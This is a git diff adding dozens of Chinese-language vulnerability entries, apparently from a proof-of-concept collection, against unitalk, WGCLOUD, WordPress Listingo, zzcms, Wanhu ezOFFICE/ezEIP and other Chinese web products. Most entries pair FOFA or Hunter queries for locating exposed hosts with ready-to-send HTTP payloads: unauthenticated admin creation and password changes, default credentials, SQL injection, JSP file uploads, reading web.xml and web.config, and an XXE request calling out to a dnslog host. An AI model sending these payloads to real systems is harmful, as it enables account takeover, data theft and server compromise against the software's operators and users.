+![1723521739904-fc153017-0a38-40a5-9656-f51032a33d77.png](./img/S4lPrhEtVBKiZ1xe/1723521739904-fc153017-0a38-40a5-9656-f51032a33d77-141909.png)
+
+删除用户
+
+```plain
+POST /unitalk/v1.0/user/delete.json HTTP/1.1
+Host: 172.18.14.68:7778
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Accept: application/json, text/plain, */*
+Content-Type: application/json;charset=UTF-8
+Content-Length: 48
+
+{"token":"87535651-49c2-4a19-8aeb-401fc16c2366"}
+```
+
+![1723521790592-8117867d-3825-480f-8ec9-3db0f77d5693.png](./img/S4lPrhEtVBKiZ1xe/1723521790592-8117867d-3825-480f-8ec9-3db0f77d5693-876257.png)
+
+
+
+> 更新: 2024-09-05 23:21:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/itmebnwadmoelggp>
\ No newline at end of file
diff --git a/unitalk存在任意用户密码修改漏洞.md b/unitalk存在任意用户密码修改漏洞.md
new file mode 100644
index 0000000..281e5fa
--- /dev/null
+++ b/unitalk存在任意用户密码修改漏洞.md
@@ -0,0 +1,48 @@
+# unitalk存在任意用户密码修改漏洞
+
+# 一、漏洞简介
+unitalk是一款即时通讯软件，unitalk存在任意用户密码修改
+
+# 二、影响版本
++ unitalk
+
+# 三、资产测绘
++ fofa`title="unitalk"`
++ 特征
+
+![1723520849027-9f8e29d4-1ac6-46e0-b014-eb6ac435cc13.png](./img/WSajtDrdCsRNXkAS/1723520849027-9f8e29d4-1ac6-46e0-b014-eb6ac435cc13-235810.png)
+
+# 四、漏洞复现
+先获取token
+
+```plain
+POST /unitalk/v1.0/user/getallusers.json HTTP/1.1
+Host: 172.18.14.68:7778
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.35
+Content-Type: application/json;charset=UTF-8
+
+{}
+```
+
+![1723521739904-fc153017-0a38-40a5-9656-f51032a33d77.png](./img/WSajtDrdCsRNXkAS/1723521739904-fc153017-0a38-40a5-9656-f51032a33d77-254525.png)
+
+修改密码
+
+```plain
+POST /unitalk/v1.0/user/updateuser.json HTTP/1.1
+Host: 172.18.14.68:7778
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Accept-Language: zh-CN,zh;q=0.9
+Content-Type: application/json;charset=UTF-8
+Content-Length: 99
+
+{"name":"admin123","role":"admin","pwd":"admin1234","token":"87535651-49c2-4a19-8aeb-401fc16c2366"}
+```
+
+![1723521732885-692972b1-b3fb-4ab3-a25e-dc1698149902.png](./img/WSajtDrdCsRNXkAS/1723521732885-692972b1-b3fb-4ab3-a25e-dc1698149902-653368.png)
+
+
+
+> 更新: 2024-09-05 23:21:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qkiwy4qgvglm28o8>
\ No newline at end of file
diff --git a/unitalk存在任意用户添加漏洞.md b/unitalk存在任意用户添加漏洞.md
new file mode 100644
index 0000000..7b0a3da
--- /dev/null
+++ b/unitalk存在任意用户添加漏洞.md
@@ -0,0 +1,34 @@
+# unitalk存在任意用户添加漏洞
+
+# 一、漏洞简介
+unitalk是一款即时通讯软件，unitalk存在任意用户添加漏洞
+
+# 二、影响版本
++ unitalk
+
+# 三、资产测绘
++ fofa`title="unitalk"`
++ 特征
+
+![1723520849027-9f8e29d4-1ac6-46e0-b014-eb6ac435cc13.png](./img/21G5icesDMJ_SYeY/1723520849027-9f8e29d4-1ac6-46e0-b014-eb6ac435cc13-275032.png)
+
+# 四、漏洞复现
+```plain
+POST /unitalk/v1.0/user/add.json HTTP/1.1
+Host: 
+Content-Type: application/json;charset=UTF-8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Accept: application/json, text/plain, */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Content-Length: 62
+
+{"name":"admin123","role":"admin","pwd":"admin123","token":""}
+```
+
+![1723521483724-f75815f8-4d99-4335-9f9e-a9e515d80f87.png](./img/21G5icesDMJ_SYeY/1723521483724-f75815f8-4d99-4335-9f9e-a9e515d80f87-382491.png)
+
+
+
+> 更新: 2024-09-05 23:21:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/liqozczwz3ct02br>
\ No newline at end of file
diff --git a/unitalk存在敏感信息泄露漏洞.md b/unitalk存在敏感信息泄露漏洞.md
new file mode 100644
index 0000000..26fa53c
--- /dev/null
+++ b/unitalk存在敏感信息泄露漏洞.md
@@ -0,0 +1,30 @@
+# unitalk存在敏感信息泄露漏洞
+
+# 一、漏洞简介
+unitalk是一款即时通讯软件，unitalk存在敏感信息泄露漏洞
+
+# 二、影响版本
++ unitalk
+
+# 三、资产测绘
++ fofa`title="unitalk"`
++ 特征
+
+![1723520849027-9f8e29d4-1ac6-46e0-b014-eb6ac435cc13.png](./img/5y4QT2B7hlz5Oba0/1723520849027-9f8e29d4-1ac6-46e0-b014-eb6ac435cc13-815430.png)
+
+# 四、漏洞复现
+```plain
+POST /unitalk/v1.0/user/getallusers.json HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.35
+Content-Type: application/json;charset=UTF-8
+
+{}
+```
+
+![1723521050837-41476540-13f8-4fdc-80d8-f22c2fe6081a.png](./img/5y4QT2B7hlz5Oba0/1723521050837-41476540-13f8-4fdc-80d8-f22c2fe6081a-283024.png)
+
+
+
+> 更新: 2024-09-05 23:21:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xwkb6kvo30rpcip8>
\ No newline at end of file
diff --git a/unitalk存在默认弱口令漏洞.md b/unitalk存在默认弱口令漏洞.md
new file mode 100644
index 0000000..b93e707
--- /dev/null
+++ b/unitalk存在默认弱口令漏洞.md
@@ -0,0 +1,25 @@
+# unitalk存在默认弱口令漏洞
+
+# 一、漏洞简介
+unitalk是一款即时通讯软件，unitalk存在默认弱口令漏洞
+
+# 二、影响版本
++ unitalk
+
+# 三、资产测绘
++ fofa`title="unitalk"`
++ 特征
+
+![1723520849027-9f8e29d4-1ac6-46e0-b014-eb6ac435cc13.png](./img/r4U6CxAFixwqF68e/1723520849027-9f8e29d4-1ac6-46e0-b014-eb6ac435cc13-181498.png)
+
+# 四、漏洞复现
+```plain
+admin/123456
+```
+
+![1723520815146-a5c0eeb2-5604-4c79-96b9-62c2f32c3fa5.png](./img/r4U6CxAFixwqF68e/1723520815146-a5c0eeb2-5604-4c79-96b9-62c2f32c3fa5-228336.png)
+
+
+
+> 更新: 2024-09-05 23:21:36  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tr0gexzqbeulpspz>
\ No newline at end of file
diff --git a/wgcloud存在弱口令漏洞.md b/wgcloud存在弱口令漏洞.md
new file mode 100644
index 0000000..04b2307
--- /dev/null
+++ b/wgcloud存在弱口令漏洞.md
@@ -0,0 +1,27 @@
+# wgcloud 存在弱口令漏洞
+
+# 一、漏洞简介
+WGCLOUD设计思想为新一代极简运维监控系统，提倡快速部署，降低运维学习难度，全自动化运行，无模板和脚本。wgcloud 存在弱口令漏洞。
+
+# 二、影响版本
++ WGCLOUD
+
+# 三、资产测绘
++ hunter`app.name="WGCLOUD"`
+
+# 四、漏洞复现
+```plain
+admin/111111
+admin/admin123
+admin/mall123
+admin/promotion123
+```
+
+![1708917579157-caa7ef0c-2643-4a3c-8e1e-32f90e179071.png](./img/UvieiqQPBxxJVlH7/1708917579157-caa7ef0c-2643-4a3c-8e1e-32f90e179071-556641.png)
+
+[wgcloud.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222141179-a4f038b2-589b-4f05-a78e-dbe4f397f14f.yaml)
+
+
+
+> 更新: 2024-02-29 23:55:41  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xgfgq2u0fd358i6o>
\ No newline at end of file
diff --git a/wordpress-listingo-文件上传漏洞.md b/wordpress-listingo-文件上传漏洞.md
new file mode 100644
index 0000000..a823ecd
--- /dev/null
+++ b/wordpress-listingo-文件上传漏洞.md
@@ -0,0 +1,27 @@
+##  wordpress listingo 文件上传漏洞
+
+## fofa
+```
+body="wp-content/themes/listingo"
+```
+
+## poc
+```
+POST /wp-admin/admin-ajax.php?action=listingo_temp_uploader HTTP/1.1
+Host: targetUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8rVjnfcgxgKoytcgAccept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Content-Length: 531
+
+------WebKitFormBoundary8rVjnfcgxgKoytcg
+Content-Disposition: form-data; name="listingo_uploader";filename="1008.php"
+Content-Type:text/php
+
+<?phpphpinfo();?>
+------WebKitFormBoundary8rVjnfcgxgKoytcg
+Content-Disposition: form-data; name="submit"
+
+Start Uploader
+------WebKitFormBoundary8rVjnfcgxgKoytcg--
+```
+![image](https://github.com/wy876/POC/assets/139549762/8b115456-bcbe-4d0f-b51d-add3dcf0db78)
diff --git a/zzcms系统接口ad_list.php存在SQL注入漏洞.md b/zzcms系统接口ad_list.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..ededcc4
--- /dev/null
+++ b/zzcms系统接口ad_list.php存在SQL注入漏洞.md
@@ -0,0 +1,22 @@
+# zzcms系统接口ad_list.php存在SQL注入漏洞
+
+ZZCMS 2023是一款快速建站系统，产品招商模板程序源码，可以快速搭建产品招商网。例如医药招商、保健品招商、化妆品招商、农产品招商、孕婴童招商、酒类副食品等。 /admin/ad_list.php组件中关键字过滤导致sql注入漏洞
+
+## poc
+
+```javascript
+GET /admin/ad_list.php?action=pass&&keyword='+union+SELECT+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,sleep(5)+--+x HTTP/1.1
+Host: 127.0.0.1:8888
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
+Cookie: http304ok=0; PHPSESSID=pvpehubud7epklbme9m4s69b0q;
+Connection: close
+```
+
+![image-20250124101147558](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501241011639.png)
+
+## 漏洞来源
+
+- https://github.com/En0t5/vul/blob/main/zzcms/zzcms-add_list-sql-inject.md
\ No newline at end of file
diff --git a/zzcms系统接口index.php存在SQL注入漏洞.md b/zzcms系统接口index.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..4b24564
--- /dev/null
+++ b/zzcms系统接口index.php存在SQL注入漏洞.md
@@ -0,0 +1,16 @@
+# zzcms系统接口index.php存在SQL注入漏洞
+
+ZZCMS 2023中发现了一个严重漏洞。该漏洞影响了文件/index.php中的某些未知功能,操纵参数id会导致SQL注入,攻击可能是远程发起的,该漏洞已被公开披露并可被利用。 
+
+## poc
+
+```javascript
+http://127.0.0.1:8888/zhanting/index.php?id=1'union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,sleep(5)+--+x&skin=
+
+```
+
+![image-20250124101356743](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501241013807.png)
+
+## 漏洞来源
+
+- https://github.com/En0t5/vul/blob/main/zzcms/zzcsm-sql-inject.md
\ No newline at end of file
diff --git a/万户-ezOFFICE-DocumentEdit.jsp-SQL注入.md b/万户-ezOFFICE-DocumentEdit.jsp-SQL注入.md
new file mode 100644
index 0000000..6772d8a
--- /dev/null
+++ b/万户-ezOFFICE-DocumentEdit.jsp-SQL注入.md
@@ -0,0 +1,18 @@
+## 万户 ezOFFICE DocumentEdit.jsp SQL注入
+
+DocumentEdit.jsp接口处存在sql注入漏洞，攻击者可获取数据库中敏感信息
+
+## fofa
+```
+app="ezOFFICE协同管理平台"
+```
+
+## poc
+```
+GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1'%20union%20select%20null,null,(select%20user%20from%20dual),null,null,null,null,null,null,null%20from%20dual-- HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+![image](https://github.com/wy876/POC/assets/139549762/899ccb8d-22a3-4c5b-a50b-9d8a64ac73aa)
diff --git a/万户OA-fileUpload.controller任意文件上传漏洞.md b/万户OA-fileUpload.controller任意文件上传漏洞.md
new file mode 100644
index 0000000..0e84d9d
--- /dev/null
+++ b/万户OA-fileUpload.controller任意文件上传漏洞.md
@@ -0,0 +1,32 @@
+## 万户OA-fileUpload.controller任意文件上传漏洞
+
+万户OA /defaultroot/upload/fileUpload.controller 任意文件上传漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。
+
+## fofa
+```javascript
+app="万户ezOFFICE协同管理平台"
+```
+
+## poc
+```javascript
+POST /defaultroot/upload/fileUpload.controller HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: Keep-Alive
+Content-Type: multipart/form-data; boundary=KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0
+Content-Length: 773
+
+--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0
+Content-Disposition: form-data; name="file"; filename="cmd.jsp"
+Content-Type: application/octet-stream
+Content-Transfer-Encoding: binary
+
+aaaaa
+--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0--
+```
+![47f45d2a4762a6cf52707c1cddc901ef](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409261037078.png)
+
+文件路径` /defaultroot/upload/html/xxxxxxxxxx.jsp`
+
diff --git a/万户OA-text2Html接口存在任意文件读取漏洞.md b/万户OA-text2Html接口存在任意文件读取漏洞.md
new file mode 100644
index 0000000..a271989
--- /dev/null
+++ b/万户OA-text2Html接口存在任意文件读取漏洞.md
@@ -0,0 +1,22 @@
+## 万户OA text2Html接口存在任意文件读取漏洞
+
+## fofa
+```
+app="万户网络-ezOFFICE"
+```
+
+## poc
+```
+POST /defaultroot/convertFile/text2Html.controller HTTP/1.1
+Host:  
+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
+Connection: close
+Content-Length: 63
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+SL-CE-SUID: 1081
+
+saveFileName=123456/../../../../WEB-INF/web.xml&moduleName=html
+```
+
+![e776895b9471c04a60d74a1666b56e1b](https://github.com/wy876/POC/assets/139549762/8217e88a-f2f5-47ba-9c27-eb765cbbed78)
diff --git a/万户OA系统接口GeneralWeb存在XXE漏洞.md b/万户OA系统接口GeneralWeb存在XXE漏洞.md
new file mode 100644
index 0000000..d656f8a
--- /dev/null
+++ b/万户OA系统接口GeneralWeb存在XXE漏洞.md
@@ -0,0 +1,39 @@
+# 万户OA系统接口GeneralWeb存在XXE漏洞
+
+万户OA系统接口GeneralWeb存在XXE漏洞，允许攻击者利用XML解析器处理外部实体，从而访问本地文件或进行其他恶意操作，可能导致敏感信息泄露和系统被攻击。
+
+## fofa
+
+```javascript
+app="万户ezOFFICE协同管理平台"
+```
+
+## poc
+
+```javascript
+POST /defaultroot/xfservices/./GeneralWeb HTTP/1.1
+Host: 
+User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
+Content-Type: text/xml;charset=UTF-8
+SOAPAction: 
+Content-Length: 457
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:gen="http://com.whir.service/GeneralWeb">
+  <soapenv:Body>
+    <gen:OAManager>
+      <gen:input>
+        &lt;?xml version="1.0" encoding="UTF-8"?&gt;
+        &lt;!DOCTYPE root [
+        &lt;!ENTITY x SYSTEM "http://123.6x9ryk.dnslog.cn"&gt;]&gt;
+        &lt;root&gt;&amp;x;&lt;/root&gt;
+      </gen:input>
+    </gen:OAManager>
+  </soapenv:Body>
+</soapenv:Envelope>
+```
+
+
+
+## 漏洞来源
+
+- https://forum.butian.net/share/3784
\ No newline at end of file
diff --git a/万户ezEIP企业管理系统productlist.aspx存在SQL注入漏洞.md b/万户ezEIP企业管理系统productlist.aspx存在SQL注入漏洞.md
new file mode 100644
index 0000000..1ab4825
--- /dev/null
+++ b/万户ezEIP企业管理系统productlist.aspx存在SQL注入漏洞.md
@@ -0,0 +1,26 @@
+# 万户ezEIP企业管理系统productlist.aspx存在SQL注入漏洞
+
+万户ezEIP企业管理系统productlist.aspx存在SQL注入漏洞，未授权的攻击者可利用此漏洞获取数据库权限，深入利用可获取服务器权限。
+
+## fofa
+
+```javascript
+body="ezEIP" || header="ezEIP" || body="css/css_whir.css"
+```
+
+## poc
+
+```javascript
+POST /shop/productlist.aspx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br, zstd
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+
+ob=price&price=asc&svids=-1%29%3BDECLARE+%40%40proc_name+VARCHAR%28301%29%3BSet+%40%40proc_name%3DChar%28115%29%252bChar%28101%29%252bChar%28108%29%252bChar%28101%29%252bChar%2899%29%252bChar%28116%29%252bChar%2832%29%252bChar%2849%29%252bChar%2832%29%252bChar%28119%29%252bChar%28104%29%252bChar%28101%29%252bChar%28114%29%252bChar%28101%29%252bChar%2832%29%252bChar%2849%29%252bChar%2861%29%252bChar%2849%29%252bChar%2832%29%252bChar%2887%29%252bChar%2865%29%252bChar%2873%29%252bChar%2884%29%252bChar%2870%29%252bChar%2879%29%252bChar%2882%29%252bChar%2832%29%252bChar%2868%29%252bChar%2869%29%252bChar%2876%29%252bChar%2865%29%252bChar%2889%29%252bChar%2832%29%252bChar%2839%29%252bChar%2848%29%252bChar%2858%29%252bChar%2848%29%252bChar%2858%29%252bChar%2853%29%252bChar%2839%29%3BEXECUTE+%28%40%40proc_name%29%3B--a%2B
+```
+
+![image-20241017144051590](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410171440685.png)
\ No newline at end of file
diff --git a/万户ezOFFICE协同管理平台receivefile_gd.jsp存在SQL注入漏洞.md b/万户ezOFFICE协同管理平台receivefile_gd.jsp存在SQL注入漏洞.md
new file mode 100644
index 0000000..5803b6b
--- /dev/null
+++ b/万户ezOFFICE协同管理平台receivefile_gd.jsp存在SQL注入漏洞.md
@@ -0,0 +1,24 @@
+# 万户ezOFFICE协同管理平台receivefile_gd.jsp存在SQL注入漏洞
+
+万户ezOFFICE协同管理平台receivefile_gd.jsp存在SQL注入漏洞，攻击者可获取数据库敏感信息。
+
+## fofa
+
+```yaml
+app="万户ezOFFICE协同管理平台"
+```
+
+## poc
+
+```
+GET /defaultroot/modules/govoffice/gov_documentmanager/receivefile_gd.jsp;.js?recordId=221;waitfor+delay+'0:0:5'--+- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
+Connection: close
+```
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/Oy5iPqfBXAh46tjHZFSg8w
\ No newline at end of file
diff --git a/万户ezOFFICE系统接口SendFileCheckTemplateEdit.jsp存在SQL注入漏洞.md b/万户ezOFFICE系统接口SendFileCheckTemplateEdit.jsp存在SQL注入漏洞.md
new file mode 100644
index 0000000..232fe6e
--- /dev/null
+++ b/万户ezOFFICE系统接口SendFileCheckTemplateEdit.jsp存在SQL注入漏洞.md
@@ -0,0 +1,26 @@
+# 万户ezOFFICE系统接口SendFileCheckTemplateEdit.jsp存在SQL注入漏洞
+
+万户OA DocumentEdit.jsp存在前台SQL注入漏洞，攻击者利用此漏洞获取数据库权限，深入利用可获取服务器权限。
+
+## fofa
+
+```javascript
+app="万户网络-ezOFFICE"
+```
+
+## poc
+
+```bat
+GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1%27%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27admin%27)),NULL,NULL,NULL,NULL,NULL-- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
+Connection: close
+```
+
+![图片.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409241012161.png)
+
+
+
+## 漏洞来源
+
+- https://forum.butian.net/article/600
\ No newline at end of file
diff --git a/万户ezOFFICE系统接口filesendcheck_gd.jsp存在SQL注入漏洞.md b/万户ezOFFICE系统接口filesendcheck_gd.jsp存在SQL注入漏洞.md
new file mode 100644
index 0000000..84e6a3d
--- /dev/null
+++ b/万户ezOFFICE系统接口filesendcheck_gd.jsp存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# 万户ezOFFICE系统接口filesendcheck_gd.jsp存在SQL注入漏洞
+
+万户 ezOFFICE filesendcheck_gd.jsp 接口处存在SQL注入漏洞，未授权的攻击者可利用此漏洞获取数据库权限，深入利用可获取服务器权限。
+
+## fofa
+
+```yaml
+app="万户ezOFFICE协同管理平台"
+```
+
+## poc
+
+```javascript
+GET /defaultroot/modules/govoffice/gov_documentmanager/filesendcheck_gd.jsp;.js?recordId=1;waitfor+delay+'0:0:5'-- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409101024017.png)
\ No newline at end of file
diff --git a/万户ezoffice-wpsservlet任意文件上传漏洞.md b/万户ezoffice-wpsservlet任意文件上传漏洞.md
new file mode 100644
index 0000000..c18efa4
--- /dev/null
+++ b/万户ezoffice-wpsservlet任意文件上传漏洞.md
@@ -0,0 +1,28 @@
+## 万户ezoffice wpsservlet任意文件上传漏洞
+万户ezOFFICE协同管理平台是一个综合信息基础应用平台分为企业版和政务版。解决方案由五大应用、两个支撑平台组成，分别为知识管理、工作流程、沟通交流、辅助办公、集成解决方案及应用支撑平台、基础支撑平台。万户ezOFFICE协同管理平台wpsservlet接口存在任意文件上传。攻击者可上传恶意脚本文件获取服务器权限。
+
+
+## fofa
+```
+app="万户网络-ezOFFICE"
+```
+
+## poc
+```
+POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
+Host: x.x.x.x
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
+Content-Length: 173Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Connection: close
+Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerpDNT: 1
+Upgrade-Insecure-Requests: 1
+
+--ufuadpxathqvxfqnuyuqaozvseiueerp
+Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
+
+<% out.print("sasdfghjkj");%>
+--ufuadpxathqvxfqnuyuqaozvseiueerp--
+```
+文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
+
diff --git a/万户ezoffice协同办公平台SignatureEditFrm存在SQL注入漏洞.md b/万户ezoffice协同办公平台SignatureEditFrm存在SQL注入漏洞.md
new file mode 100644
index 0000000..0a6bdae
--- /dev/null
+++ b/万户ezoffice协同办公平台SignatureEditFrm存在SQL注入漏洞.md
@@ -0,0 +1,27 @@
+# 万户ezoffice协同办公平台SignatureEditFrm存在SQL注入漏洞
+万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户协同办公平台SignatureEditFrm.jsp存在SQL注入漏洞，<font style="color:rgb(62, 62, 62);">攻击者通过发送特殊的请求包可以对数据库进行SQL注入，获取服务器敏感信息。</font>
+
+## hunter
+
+```javascript
+app.name="万户 Ezoffice OA"
+```
+
+## fofa 
+
+```javascript
+app="万户ezOFFICE协同管理平台"
+```
+
+![](https://cdn.nlark.com/yuque/0/2023/png/1622799/1694241158110-8d4eef16-79f1-46eb-899b-344bd2a7a19f.png)
+
+## poc
+```javascript
+GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iWebRevision.jsp/Signature/SignatureEditFrm.jsp?SignatureID=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
+Connection: close
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1729701858827-06212d8a-1006-466d-ad6c-dae829018f0a.png)
+
diff --git a/万江港利山洪灾害预警系统FileHandler存在任意文件读取漏洞.md b/万江港利山洪灾害预警系统FileHandler存在任意文件读取漏洞.md
new file mode 100644
index 0000000..35314c6
--- /dev/null
+++ b/万江港利山洪灾害预警系统FileHandler存在任意文件读取漏洞.md
@@ -0,0 +1,29 @@
+# 万江港利山洪灾害预警系统FileHandler存在任意文件读取漏洞
+
+# 一、漏洞简介
+万江港利山洪灾害防治预警系统软件是对空间信息技术、计算机网络技术、现代通信技术进行无缝集成，结合灾害监测预警的业务需求，采用世界领先GIS地理信息处理技术、RS遥感技术、GPRS/CMDA/3G通讯技术、Microsoft Silverlight Web前端应用程式开发解决方案、以及大容量数据采集技术和大容量数据存储等计算机网络通信与数据处理技术，建立一个用户界面友好的、多终端的、可定制的、集数据采集、存储、分析于一体的综合地理信息平台。该系统存在任意文件读取漏洞，攻击者可获取大量敏感信息。
+
+# 二、影响版本
++ 万江港利山洪灾害防治预警系统
+
+# 三、资产测绘
++ hunter`web.body="万江港利"&&web.body="山洪灾害"`
++ 特征
+
+![1707060667669-c1ce32a0-4c8f-48f5-8702-058ae589fffa.png](./img/A2AaAQ5sO23Cp0KK/1707060667669-c1ce32a0-4c8f-48f5-8702-058ae589fffa-102132.png)
+
+# 四、漏洞复现
+```plain
+GET /Service/FileHandler.ashx?Action=Download&FileDirectory=E:/SCWJ/Official/Web/MFCW/&FileName=web.config&FileSourceName=web HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
+Host: 
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1707060726033-c1ac27d9-a692-4c07-8089-79dba4b37fea.png](./img/A2AaAQ5sO23Cp0KK/1707060726033-c1ac27d9-a692-4c07-8089-79dba4b37fea-174339.png)
+
+
+
+> 更新: 2024-02-29 23:55:41  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/oeggkvpxmlddh3qv>
\ No newline at end of file
diff --git a/万能门店小程序doPageGetFormList存在sql注入漏洞.md b/万能门店小程序doPageGetFormList存在sql注入漏洞.md
new file mode 100644
index 0000000..999c1eb
--- /dev/null
+++ b/万能门店小程序doPageGetFormList存在sql注入漏洞.md
@@ -0,0 +1,21 @@
+# 万能门店小程序doPageGetFormList存在sql注入漏洞
+
+万能门店小程序DIY建站无限独立版非微擎应用，独立版是基于国内很火的ThinkPHP5框架开发的，适用于各行各业小程序、企业门店小程序，万能门店小程序doPageGetFormList存在sql注入漏洞
+
+## fofa
+
+```javascript
+"/comhome/cases/index.html" 
+```
+
+## poc
+
+```javascript
+POST /api/wxapps/doPageGetFormList HTTP/1.1
+Host:
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+
+suid='AND GTID_SUBSET(CONCAT((SELECT(md5(123456)))),3119)-- bdmV
+```
+
diff --git a/万能门店小程序管理系统onepic_uploade任意文件上传漏洞.md b/万能门店小程序管理系统onepic_uploade任意文件上传漏洞.md
new file mode 100644
